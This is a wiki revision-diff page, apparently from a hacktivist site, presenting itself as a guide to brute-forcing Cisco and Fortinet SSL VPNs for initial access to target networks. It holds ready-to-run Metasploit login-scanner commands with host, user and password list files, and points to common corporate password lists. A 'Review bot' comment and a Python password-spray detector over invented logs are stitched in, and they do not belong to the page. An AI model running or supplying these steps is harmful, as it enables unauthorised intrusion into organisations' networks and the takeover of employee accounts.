VPN brute forcing: Difference between revisions
mNo edit summary |
mNo edit summary |
||
Line 1: | Line 1: | ||
Brute force common corporate VPNs to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. | [https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this split a large host file down into multiple sub files and run the module against smaller host files. | ||
You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with. | |||
== CISCO == | == CISCO == | ||
<pre> | <pre> | ||
Line 28: | Line 29: | ||
run | run | ||
</pre> | </pre> | ||
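Review bot: The sentence added at the end of the first paragraph contradicts itself: "For this to work properly using a large IP host file will cause the module to hang for a very long time" opens as a requirement and ends as a failure. State the limitation first and the workaround second. The added SecLists line also spells the project "Seclists", which does not match the repository name in the URLs it links to.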
Revision as of 18:09, 31 August 2023
Brute force common corporate VPNs to gain initial access to target networks. Install Metasploit and then see Initial access TTPs for mass scanning ports. Using a large IP host file will cause the module to hang for a very long time. To fix this, split a large host file into multiple sub-files and run the module against the smaller host files.
You can use SecLists for common usernames and passwords to brute-force with.
CISCO
<pre>
sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run
</pre>
FORTI SSL VPN
<pre>
sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run
</pre>
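On the defending side, a username-list and password-list run against a VPN portal shows up as a burst of failed logins from one source spread across many distinct accounts. The following is an added example, not part of the original page: a Python detector over constructed log lines, where the log format, thresholds and function names are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a hypothetical log format; adapt LINE_RE to real VPN logs.
SAMPLE_LOG = """\
2023-08-31T18:00:01 vpn-auth result=FAIL user=admin src=203.0.113.7
2023-08-31T18:00:02 vpn-auth result=FAIL user=test src=203.0.113.7
2023-08-31T18:00:02 vpn-auth result=FAIL user=guest src=203.0.113.7
2023-08-31T18:00:03 vpn-auth result=FAIL user=alice src=198.51.100.20
2023-08-31T18:00:04 vpn-auth result=FAIL user=vpn src=203.0.113.7
2023-08-31T18:00:05 vpn-auth result=FAIL user=admin src=203.0.113.7
2023-08-31T18:00:06 vpn-auth result=FAIL user=test src=203.0.113.7
2023-08-31T18:00:20 vpn-auth result=OK user=alice src=198.51.100.20
2023-08-31T18:00:31 vpn-auth result=OK user=guest src=203.0.113.7
malformed line that the parser must skip
"""
LINE_RE = re.compile(r"^(\S+) vpn-auth result=(OK|FAIL) user=(\S+) src=(\S+)$")

def parse(log_text):
    """Yield (timestamp, ok, user, src) for well-formed lines; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, result, user, src = m.groups()
            yield datetime.fromisoformat(ts), result == "OK", user, src

def detect_spray(events, window=timedelta(minutes=5), min_users=4, min_failures=6):
    """Flag sources whose failures in a sliding window span many distinct users.
    Returns {src: {"users": [...], "logins": [...]}}; "logins" lists accounts
    that authenticated successfully from a flagged source (triage first)."""
    fails, oks = defaultdict(list), defaultdict(set)
    for ts, ok, user, src in events:
        if ok:
            oks[src].add(user)
        else:
            fails[src].append((ts, user))
    alerts = {}
    for src, items in fails.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            users = {u for _, u in items[start:end + 1]}
            if end - start + 1 >= min_failures and len(users) >= min_users:
                alerts[src] = {"users": sorted(users), "logins": sorted(oks[src])}
                break
    return alerts
```

A single user mistyping a password (198.51.100.20 in the sample) stays below both thresholds, while a successful login from a flagged source is surfaced for account lockout and credential reset.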